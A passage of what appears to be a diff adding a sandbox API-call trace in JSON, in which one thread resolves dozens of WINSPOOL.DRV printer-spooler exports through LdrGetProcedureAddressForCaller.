"FunctionName", + "value": "CorePrinterDriverInstalledW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7398ef80" + } + ], + "repeated": 0, + "id": 47 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739675f5", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetCorePrinterDriversW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7398f520" + } + ], + "repeated": 0, + "id": 48 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967606", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "UploadPrinterDriverPackageW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7398fe80" + } + ], + "repeated": 0, + "id": 49 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967617", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "InstallPrinterDriverFromPackageW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7398fb40" + } + ], + "repeated": 0, + "id": 50 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967628", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "251" + }, + { + "name": "FunctionAddress", + "value": "0x739648c0" + } + ], + "repeated": 0, + "id": 51 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967639", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddPrinterConnection2W" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7398e4a0" + } + ], + "repeated": 0, + "id": 52 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396764a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "OpenPrinter2W" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x739667b0" + } + ], + "repeated": 0, + "id": 53 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396765b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterKeyW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73980230" + } + ], + "repeated": 0, + "id": 54 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396766c", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDataExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397fe30" + } + ], + "repeated": 0, + "id": 55 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396767d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumPrinterKeyW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73981030" + } + ], + "repeated": 0, + "id": 56 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396768e", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumPrinterDataExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73980ba0" + } + ], + "repeated": 0, + "id": 57 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396769f", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDataExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395f930" + } + ], + "repeated": 0, + "id": 58 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739676b0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SetPrinterDataExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73983460" + } + ], + "repeated": 0, + "id": 59 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739676c1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDataW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397ff40" + } + ], + "repeated": 0, + "id": 60 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739676d2", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumPrinterDataW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73980d30" + } + ], + "repeated": 0, + "id": 61 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739676e3", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SpoolerPrinterEvent" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73983be0" + } + ], + "repeated": 0, + "id": 62 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739676f4", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SetPortW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73983350" + } + ], + "repeated": 0, + "id": 63 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967705", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DocumentPropertySheets" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73960320" + } + ], + "repeated": 0, + "id": 64 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967716", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DevicePropertySheets" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73984130" + } + ], + "repeated": 0, + "id": 65 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967727", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "IsValidDevmodeW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73965910" + } + ], + "repeated": 0, + "id": 66 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967738", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "IsValidDevmodeA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x739761a0" + } + ], + "repeated": 0, + "id": 67 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967749", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddPortExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397e0d0" + } + ], + "repeated": 0, + "id": 68 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396775a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrintProvidorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397fc10" + } + ], + "repeated": 0, + "id": 69 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396776b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddPrintProvidorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397e2f0" + } + ], + "repeated": 0, + "id": 70 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396777c", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrintProcessorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397fb20" + } + ], + "repeated": 0, + "id": 71 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396778d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeleteMonitorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397f950" + } + ], + "repeated": 0, + "id": 72 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396779e", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddMonitorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397df00" + } + ], + "repeated": 0, + "id": 73 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739677af", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "StartDocDlgW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395cf00" + } + ], + "repeated": 0, + "id": 74 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739677c0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AdvancedDocumentPropertiesW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397efa0" + } + ], + "repeated": 0, + "id": 75 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739677d1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AdvancedDocumentPropertiesA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73973e00" + } + ], + "repeated": 0, + "id": 76 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739677e2", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DocumentPropertiesW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395ffc0" + } + ], + "repeated": 0, + "id": 77 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739677f3", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeviceCapabilitiesW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395fd90" + } + ], + "repeated": 0, + "id": 78 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967804", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterIC" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395e900" + } + ], + "repeated": 0, + "id": 79 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967815", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "PlayGdiScriptOnPrinterIC" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395e990" + } + ], + "repeated": 0, + "id": 80 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967826", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "CreatePrinterIC" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395ea20" + } + ], + "repeated": 0, + "id": 81 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967837", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SetJobW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73983170" + } + ], + "repeated": 0, + "id": 82 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967848", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetJobW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73981530" + } + ], + "repeated": 0, + "id": 83 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967859", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumJobsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395e590" + } + ], + "repeated": 0, + "id": 84 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396786a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397ec00" + } + ], + "repeated": 0, + "id": 85 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396787b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "SetPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73983690" + } + ], + "repeated": 0, + "id": 86 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396788c", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDriverW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73961210" + } + ], + "repeated": 0, + "id": 87 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x7396789d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDriverDirectoryW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73965c40" + } + ], + "repeated": 0, + "id": 88 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739678ae", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumPrintersW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7395f610" + } + ], + "repeated": 0, + "id": 89 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739678bf", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddPrinterConnectionW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7398e730" + } + ], + "repeated": 0, + "id": 90 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739678d0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterConnectionW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7398e7b0" + } + ], + "repeated": 0, + "id": 91 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739678e1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddPrinterDriverExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397e420" + } + ], + "repeated": 0, + "id": 92 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x739678f2", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddPrinterDriverExA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73973c30" + } + ], + "repeated": 0, + "id": 93 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967903", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumPrinterDriversW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73980e80" + } + ], + "repeated": 0, + "id": 94 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967914", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDriverW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73980140" + } + ], + "repeated": 0, + "id": 95 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967925", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDriverExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73980050" + } + ], + "repeated": 0, + "id": 96 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967936", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "AddPrintProcessorW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x7397e1f0" + } + ], + "repeated": 0, + "id": 97 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967947", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": "EnumPrintProcessorsW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73980a60" + } + ], + "repeated": 0, + "id": 98 + }, + { + "timestamp": "2025-03-07 21:41:18,984", + "thread_id": "9452", + "caller": "0x756bfbba", + "parentcaller": "0x73967958", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73950000" + }, + { + "name": "FunctionName", + "value": 